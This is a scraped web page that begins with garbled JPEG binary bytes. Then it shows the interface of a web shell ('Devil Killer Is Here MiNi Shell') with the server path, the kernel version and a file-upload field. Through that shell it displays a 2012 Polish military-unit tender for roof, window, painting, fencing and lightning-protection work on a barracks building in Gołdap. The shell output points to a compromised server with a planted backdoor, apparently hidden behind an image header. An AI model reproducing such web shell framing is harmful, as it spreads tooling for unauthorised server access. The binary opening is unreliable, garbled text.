JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120323/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120323/91648-N-2012.html

<p class="kh_header"><b>Giżycko: REMONT DACHU Z WYMIANĄ DACHÓWKI 
I CZĘŚCIOWĄ WYMIANĄ DESKOWANIA, ŁACENIA DACHU. WYMIANA OKIEN W OBRĘBIE PODDASZA WRAZ Z WYMIANĄ STOLARKI OKIENNEJ I CZĘŚCIOWO DRZWIOWEJ W KANCELARIACH. REMONT PODŁÓG. MALOWANIE ŚCIAN WEWNĘTRZNYCH FARBAMI EMULSYJNYMI I ELEWACJI FARBAMI FASADOWYMI AKRYLOWYMI Z DEMONTAŻEM I MONTAŻEM INSTALACJI ODGROMOWEJ NA BUDYNKU KOSZAROWYM NR 2 NA TERENIE JW. 4808 W GOŁDAPI</b><br>
<b>Numer ogłoszenia: 91648 - 2012; data zamieszczenia: 23.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 4352 , ul. Nowowiejska 20, 11-500 Giżycko, woj. warmińsko-mazurskie, tel. 87 429 46 02, faks 87 429 46 41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.24wog.wp.mil.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.24wog.wp.mil.pl, www.bip.mon.gov.pl, www.army.mil.pl.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Obrona.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT DACHU Z WYMIANĄ DACHÓWKI 
I CZĘŚCIOWĄ WYMIANĄ DESKOWANIA, ŁACENIA DACHU. WYMIANA OKIEN W OBRĘBIE PODDASZA WRAZ Z WYMIANĄ STOLARKI OKIENNEJ I CZĘŚCIOWO DRZWIOWEJ W KANCELARIACH. REMONT PODŁÓG. MALOWANIE ŚCIAN WEWNĘTRZNYCH FARBAMI EMULSYJNYMI I ELEWACJI FARBAMI FASADOWYMI AKRYLOWYMI Z DEMONTAŻEM I MONTAŻEM INSTALACJI ODGROMOWEJ NA BUDYNKU KOSZAROWYM NR 2 NA TERENIE JW. 4808 W GOŁDAPI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Remont dachu z wymianą dachówki i częściową wymianą deskowania, łacenia dachu. Wymiana okien w obrębie poddasza wraz z wymianą stolarki okiennej i częściowo drzwiowej w kancelariach. Remont podłóg. Malowanie ścian wewnętrznych farbami emulsyjnymi i elewacji farbami fasadowymi akrylowymi. Demontaż i montaż instalacji odgromowej na budynku koszarowym nr 2 na terenie JW 4808 w Gołdapi.
Budynek Nr 2 JW. 4808 Gołdap ul Partyzantów 33 
Budynek podpiwniczony o trzech kondygnacjach nadziemnych 
i poddaszu użytkowym. Ściany konstrukcyjne murowane, dach 
o konstrukcji drewnianej, pokryty dachówką, stolarka okienna drewniana, drzwi wewnętrzne drewniane. Obiekt wyposażony 
w instalację c.o., wod-kan, elektryczną oraz instalację odgromową. 
Zakres robót obejmuje:
Przy wykonywaniu pokrycia dachowego:
-	Wykonanie na dachu pomostów poziomych,
-	Wykonanie na dachu pomostów pochyłych,
-	Wykonanie daszków zabezpieczających nad drzwiami wejściowymi do budynku,
-	Rozebranie rynien z blachy nienadającej się do użytku w100%,
-	Rozebranie rur spustowych z blachy nienadającej się do użytku,
-	Rozebranie obróbek blacharskich: murów ogniowych, okapów kołnierzy, gzymsów itp. z blachy nienadającej się do użytku, 
-	Wykonanie obróbki blacharskiej lukarn z blachy powlekanej, szerokość 
w rozwinięciu ponad 25cm,
-	Wykonanie obróbki blacharskiej kominów z blachy powlekanej, szerokość 
w rozwinięciu ponad 25cm, 
-	Przybicie deski czołowej po obwodzie okapu budynku,
-	Wykonanie obróbki blacharskiej na okapie budynku po obwodzie z blachy powlekanej, szerokość w rozwinięciu ponad 25cm 
-	Wykonanie rynien dachowych z blachy ocynkowanej półokrągłych o średnicy 18 cm
-	Wykonanie wpustów dachowych z blachy stalowej   
-	Wykonanie rur spustowych z blachy ocynkowanej. Rury spustowe okrągłe 
o średnicy 20 cm,
-	Rozbiórka pokrycia dachu z dachówek - holenderki
-	Rozebranie pokrycia gąsiorów dachowych,
-	Wymiana deskowania dachów, z desek na styk, grubości 25 mm,
-	Wzmocnienie krokwi deskami grubości 32 mm, nabicie desek 2-stronnie,
-	Wymiana łacenia dachów, łacenie pod pokrycie dachówką ponad 16 mm, 
-	Impregnacja grzybobójcza drewna metodą opryskiwania, 2-krotna, ciągła, deski i płyty,
-	Pokrycie dachów papą termozgrzewalną, na podkładzie betonowym, 
1 warstwa papy z zagruntowaniem podłoża emulsją asfaltową i ułożeniem na sucho papy perforowanej lukarny,
-	Obróbki blacharskie z blachy powlekanej, szerokość w rozwinięciu ponad 25 cm .  okapy nad drzwiami wejściowymi,
-	Obróbki blacharskie z blachy powlekanej, szerokość w rozwinięciu ponad 25 cm .  okap przy pomieszczeniu oficera dyżurnego 
-	Pokrycie dachów papą termozgrzewalną, na podkładzie betonowym, 
1 warstwa papy z zagruntowaniem podłoża emulsją asfaltową i ułożeniem na sucho papy perforowanej    zadaszenie nad oficerem dyżurnym
-	Wykonanie izolacji z MEMBRANY WYSOKOPAROPRZEPUSZCZALNEJ,
 o paroprzepuszczalności min. 1300g/m2/dobę przymocowanej do konstrukcji drewnianej dachu
-	Pokrycie dachów dachówką holenderką ceramiczną zakładkową o parametrach równorzędnych  jak dachówka holenderka typu OVH NARVIK w kolorze , wzorze . kształcie i wymiarach jaka jest na budynku nr 14 w kompleksie wojskowym przy ul. Partyzantów 33 w Gołdapi.
-	Malowanie farbą olejną elementów metalowych kanałów wentylacyjne stalowych, 
-	Wykonanie konstrukcji nośnej dla osadzenia okien w połaci dachowej,
-	Osadzenie okien w połaci dachowej, 
Przy robotach na elewacji budynku zakres prac obejmuje:
-	Ustawienie rusztowania zewnętrznego rurowego o wysokości do 15 m, 
-	Wykonanie osłon okien, folią polietylenową,
-	Odbicie tynków z murów, odbicie tynków o pow. do 5 m2 ze ścian, ściany lukarn i ściany konstrukcyjne z zaprawy cementowo-wapiennej,
-	Uzupełnienie tynków zewnętrznych zwykłych kategorii III ściany, podłoże: cegła, do 2 m2 w 1 miejscu, 
-	Uzupełnienie tynków cementowych nakrapianych, ściany płaskie, do 2 m2 w 1 miejscu, lukarny + ściany zewnętrzne
-	Uzupełnienie tynków kategorii II tynków zwykłych cementowo-wapiennych na kominach ponad dachem, 
-	Malowanie farbami fasadowymi starych tynków kominów, 2-krotne, - tynki gładkie 
-	Malowanie farbami emulsyjnymi elewacyjnymi - podcienia dachowego, 2-krotne,
-	Przygotowanie podłoża poprzez mechaniczne i umycie elewacji budynku
-	Oczyszczenie powierzchni murów - cokołu za pomocą szczotek stalowych, 
w miejscach łatwo dostępnych o pow. ponad 5 m2,
-	Malowanie cokołu dwukrotne, farbą akrylową w kolorze brązu oraz obramień drzwi wejściowych wraz z murkami oporowymi,
-	Malowanie farbami fasadowymi w kolorze piaskowym starych tynków nakrapianych, 2-krotne, 
-	Malowanie farbami fasadowymi w kolorze piaskowym starych tynków nakrapianych, 2-krotne, lukarny,
-	Malowanie farbą olejną elementów metalowych, krat zamontowanych 
w oknach z prętów prostych, 2-krotne,
-	Malowanie farbą olejną elementów metalowych, krat zamontowanych 
w oknach lukarn z prętów prostych, 2-krotne,
-	Malowanie farbą olejną elementów metalowych, krat zamontowanych 
w oknach piwnicznych z prętów prostych, 2-krotne,
-	Malowanie farbą olejną elementów metalowych, wszystkich balustrad przy budynku z prętów prostych, 2-krotne,
-	Malowanie farbą olejną elementów metalowych, słupów stalowych, średnica 100 mm, 2-krotne
-	Malowanie farbą olejną elementów ogrodzenia siatki 2-krotne,
-	Wykonanie nadlewki betonowej na istniejącej opasce przy budynku grubości 5 cm
Przy pracach polegających na wymianie stolarki okiennej okien lukarn zakres prac przewiduje:
-	Wymiana okien zespolonych na okna z PCV, okna rozwierane i uchylno-rozwierane, dwudzielne, do 1,5 m2, osadzanie na kotwach,
-	Wykonanie izolacji cieplnej z płyt styropianowych, wykonanych z pasków 
o szerokości 5 cm na ścianach,
-	Wykonanie parapetów zaokiennych z blachy ocynkowanej przy szerokości 
w rozwinięciu ponad 25 cm 
Przy wymianie stolarki okiennej na ścianach zewnętrznych budynku zakres prac przewiduje:
-	Wymianę okien zespolonych na okna z PCV, okna uchylne jednodzielne, do 1,0 m2, osadzanie na kotwach okna w pom.wc
-	Wymianę okien zespolonych na okna z PCV, okna uchylne jednodzielne, do 1,0 m2, osadzanie na kotwach okna na kl. schodowej 
-	Wymianę okien zespolonych na okna z PCV, okna rozwierane i uchylno-rozwierane, dwudzielne, ponad 2,5 m2, osadzanie na kotwach,
-	Wymianę okien zespolonych na okna z PCV, okna rozwierane i uchylno-rozwierane, dwudzielne, do 2,5 m2, osadzanie na kotwach,
-	Podcięcie krat okiennych dołem palnikiem, pręty okrągłe, średnica do 20 mm 
-	Założenie parapetów zaokiennych z blachy powlekanej wraz z narożnikami wykonanymi z PCV 
Przy transporcie i utylizacji zakres robót obejmuje:
-	Wywóz gruzu i dachówki pryzmowane samochodami samowyładowczymi 
na odległość 4 km z przeznaczeniem do utylizacji.
Przy wymianie stolarki drzwiowej wewnętrznej zakres robót obejmuje:
-	Wykucie gniazd i bruzd, objętość otworu do 0,015 m3,
-	Ułożenie nadproży prefabrykowanych,
-	Wymurowanie ścian z cegieł budowlanych pełnych, grubość 1-ej cegły, na zaprawie cementowo-wapiennej, 
-	 Wykonanie tynków zwykłych wykonywanych ręcznie na ścianach, kategorii II
-	Wykonanie tynków wewnętrznych 1-warstwowych grubości 3 mm z gipsu szpachlowego wykonywane ręcznie, ściany, podłoże z tynku
-	Malowanie farbami emulsyjnymi wewnętrznych podłoży gipsowych 
z gruntowaniem, 2-krotne
-	Osadzenie drzwi wykonanych z PCV wraz z obróbką obsadzenia, dwudzielne, ponad 2,5 m2, osadzanie na kotwach. Drzwi wyposażone w pochwyty, samozamykacz, wkładkę patentową stolarka winna być częściowo przeszklona
Przy wymianie stolarki drzwiowej w pomieszczeniu oficera dyżurnego zakres robót obejmuje:
-	Wykucie z muru, ościeżnic stalowych drzwiowych o powierzchni do 2 m2
-	Montaż drzwi stalowych kl C o grubości 5 mm zewnętrznej powierzchni blachy. Drzwi należy wyposażyć w 2 wewnętrzne zamki kl C, wizjer panoramiczny, klamkę z gałką oraz rygle przeciwwyważeniowe,
-	Montaż drzwi aluminiowych jednoskrzydłowych ciepłych zewnętrznych koloru brąz, pełnych, wyposażonych w wizjer , z samozamykacz, zamk elektromagnetyczny, pochwyt,
-	Malowanie farbami emulsyjnymi starych tynków, 2-krotne, ścian wewnętrznych, wiatrołap
-	Uszczelnienie styków ościeżnic ze ścianami,
-	Malowanie farbami emulsyjnymi starych tynków, 2-krotne, sufity wewnętrzne wiatrołap
-	Przygotowanie powierzchni z poszpachlowaniem nierówności sfalowań powierzchni tynku
-	Malowanie 2-krotne farbami olejnymi starych tynków wewnętrznych, ściany, 
z 1-krotnym szpachlowaniem, 
-	Wymiana lub uzupełnienie płytek z kamieni sztucznych do 3 szt w 1 miejscu, posadzka, płytki terakotowe30x30 cm - pierwsza
Przy wymianie stolarki okiennej w pomieszczeniu diagnostyka zakres robót przewiduje: 
-	Demontaż okien stalowych
-	Montaż okien wykonanych z PCV z obróbką obsadzenia, okna rozwierane 
i uchylno-rozwierane, dwudzielne, ponad 2,5 m2, osadzanie na kotwach 
Przy robotach malarskich i posadzkowych zakres robót obejmuje: 
-	Zeskrobanie i zmycie starej farby o powierzchni podłóg ponad 5 m2
-	Wykonanie tynków wewnętrzne 1-warstwowych z gipsu szpachlowego na stropach wykonywane ręcznie,
-	Wykonanie tynków wewnętrznych ścian 1-warstwowych z gipsu szpachlowego 
-	Malowanie farbami emulsyjnymi wewnętrznych podłoży gipsowych 
z gruntowaniem, 2-krotne
-	Malowanie farbami olejnymi starych tynków wewnętrznych, ściany, 
z 
2-krotnym szpachlowaniem, 2-krotne
-	Malowanie farbą olejną lub ftalową drzwi drewnianych, 2-krotne z 2-krotnym szpachlowaniem
-	Skasowanie wykwitów zacieków
-	Malowanie farbą olejną elementów metalowych, grzejniki radiatorowe, 
2-krotne
-	Malowanie farbą olejną elementów metalowych, rury wodociągowe i gazowe, średnica 50 mm, 2-krotne
-	Malowanie farbą olejną stolarki uprzednio malowanej, brudniki drzwiowe, 
1-krotne, pasy szerokości do 20 cm
-	Uzupełnienie tynków zwykłych wewnętrznych kat. III, zaprawa cem-wap, do 5 m2 w 1 miejscu
-	Zabezpieczenia podłóg trocinami, wraz z usunięciem
-	Wykonanie tynków uzupełniających zwykłych kategorii III w różnych miejscach na murach (ścianach) ceglanych lub betonowych, na stykach z ościeżnicami, opaskami, listwami i cokołami podłogowymi
-	Wyszpachlowanie szczelin miedzy deskami w powierzchni podłóg,
-	Mechaniczne szlifowanie starych posadzek, podłogi białe 
-	Lakierowanie posadzek, 
-	Wymiana listew przyściennych z drewna liściastego,
Zakres robót przy robotach ogrodzeniowych obejmuje:
-	Wykonanie ogrodzenie z siatki stalowej na słupkach stalowych osadzonych 
w gruncie i obetonowanych rozstaw słupów 2.10, wysokość 2.0 m, słupki 
z rur o średnicy 76 mm,
-	Zabezpieczenie ogrodzenia drutem kolczastym, mocowanym na wysięgnikach oraz drutem concertina
-	Zabezpieczenie cokołem betonowym siatki ogrodzeniowej przed podnoszeniem
Roboty elektryczne
Przy wymianie instalacji odgromowej zakres robót obejmuje:
-	Demontaż przewodów uziemiających z pręta ułożonych na dachu stromym.
-	Demontaż wsporników odstępowych instalacji odgromowej na dachu, stromym, podłoże: dachówka,
-	Demontaż przewodów wyrównawczych i odgromowych mocowanych na wspornikach na ścianie, 
-	Montaż zwodów poziomych instalacji odgromowej nienaprężonych z pręta  Fi 8 mm, dach stromy, dachówka
-	Montaż zwodów poziomych instalacji odgromowej nienaprężonych z pręta  Fi 8 mm, dach stromy, dachówka -przewody poprzeczne budynku
-	Montaż zwodów poziomych instalacji odgromowej nienaprężonych z pręta  Fi 8 mm, dach stromy, dachówka -zwody poziome na przewodach kominowych i wentylacyjnych
-	Montaż wsporników dla instalacji naprężanej na ścianach i dachach, wsporniki naciągowe z 1 złączką przelotową naprężającą na konstrukcji na śruby
-	Montaż wsporników dla instalacji odgromowej naprężanej na ścianach i dachach, naciągowe z 1 złączką przelotową naprężającą, na konstrukcji - na śruby-śruba do naciągu przewodu odprowadzającego pionowego
-	Łączenie pręta o średnicy do 10 mm na dachu za pomocą złączy skręcanych, uniwersalnych krzyżowych
-	Montaż złączy do rynny okapowej, na dachu w instalacji uziemiającej i odgromowej
-	Montaż złączy kontrolnych
-	Badanie ciągłości obwodu ochrony odgromowej budynku pomiędzy złączami kontrolnymi
-	Badania i pomiary instalacji piorunochronnej.

Warunki realizacji inwestycji:
-	realizacja robót w godzinach 700-1530 (istnieje możliwość pracy do godziny 1800 w dniach poniedziałek- piątek oraz do godz.1500 w sobotę po uzgodnieniu                      z Dowódcą Jednostki);
-	roboty będą prowadzone w budynku użytkowanym (czynny zakład);
-	zamawiający będzie wymagał, aby Wykonawca, którego oferta zostanie uznana za najkorzystniejszą w przedmiotowym postępowaniu przetargowym najpóźniej w dniu podpisania umowy dostarczył harmonogram rzeczowo-finansowy realizacji robót (załącznika nr 7 do SIWZ,  które będą stanowiły załączniki do umowy;
-	zamawiający będzie wymagał, aby Wykonawca, którego oferta zostanie uznana za najkorzystniejszą w przedmiotowym postępowaniu przetargowym najpóźniej w dniu podpisania umowy dostarczył trzy egzemplarze kosztorysów ofertowych, które będą stanowiły załączniki do umowy;
-	zamawiający będzie wymagał, aby Wykonawca, którego oferta zostanie uznana za najkorzystniejszą w przedmiotowym postępowaniu przetargowym najpóźniej w dniu podpisania umowy ustanowił kierownika budowy robót posiadającego uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994 roku - Prawo budowlane oraz dostarczy dowód jego przynależności do Izby Inżynierów Budownictwa 
i aktualne ubezpieczenie OC obejmujące okres realizacji zamówienia;
-	wykonawca robót kierownik budowy w pełni odpowiada za bezpieczeństwo 
i higienę pracy  w miejscu realizacji robót, oraz za zachowanie bezpieczeństwa pożarowego;
-	zamawiający będzie wymagał, aby Wykonawca, którego oferta zostanie uznana za najkorzystniejszą w przedmiotowym postępowaniu przetargowym najpóźniej w dniu podpisania umowy dokonał ubezpieczenia budowy na kwotę nie mniejszą niż 490 000,00 zł. oraz dostarczył dowód ubezpieczenia;
-	wykonawca zobowiązany będzie do pokrycia kosztów poboru energii elektrycznej, poboru wody i odprowadzenia ścieków związanych z realizacją robót i potrzebami socjalnymi. Sposób rozliczenia został określony we wzorze umowy.
Zbiór wymagań szczegółowych dotyczących organizacji robót, standardu i jakości wykonania, właściwości zastosowania wyrobów budowlanych oraz metod i sposobu oceny jakości wykonania zleconych prac określono w Specyfikacji Technicznej wykonania i odbioru robót budowlanych zał. nr 8 do SIWZ, przedmiarze robót zał. nr 10 i szkicach i rysunkach zał. nr 11.

Wizja lokalna. 
Zamawiający przewiduje możliwość dokonania wizji lokalnej miejsca inwestycji w terminie od 28.03.2012r. do 4.04.2012r . 
Wykonawca zobowiązany jest do wcześniejszego uzgodnienia terminu wizji lokalnej z Kierownikiem Sekcji Obsługi Infrastruktury w Gołdapi Panem Marek PODSIAD tel. 87  61 56 476, tel. 87 61 56 501.
Koszt takiej wizyty ponosi Wykonawca. 
Zamawiający dopuszcza powierzenie zamówienia podwykonawcom zgodnie z art. 36 ust. 5 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych tj. Dz. U.        z 2010 nr 113 poz. 759 z późn. zm..
Postępowanie przetargowe o udzielenie zamówienia publicznego NIEPRZEKRACZAJĄCEJ KWOTY OKREŚLONEJ W PRZEPISACH WYDANYCH NA PODSTAWIE ART. 11 UST. 8 USTAWY - PZP..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.26.21.00-2, 45.11.10.00-8, 45.42.10.00-4, 45.26.10.00-4, 45.26.11.00-5, 45.26.19.10-6, 45.26.12.10-9, 45.31.70.00-2, 45.41.00.00-4, 45.26.25.00-6, 45.26.23.00-5, 45.44.21.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagane 15 000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie na podstawie art. 44 ustawy p.z.p załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie na podstawie art. 44 ustawy p.z.p załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie na podstawie art. 44 ustawy p.z.p załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie na podstawie art. 44 ustawy p.z.p załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opłaconą polisę lub inny dokument ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia (suma ubezpieczenia nie niższa niż  100 000,00 zł).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

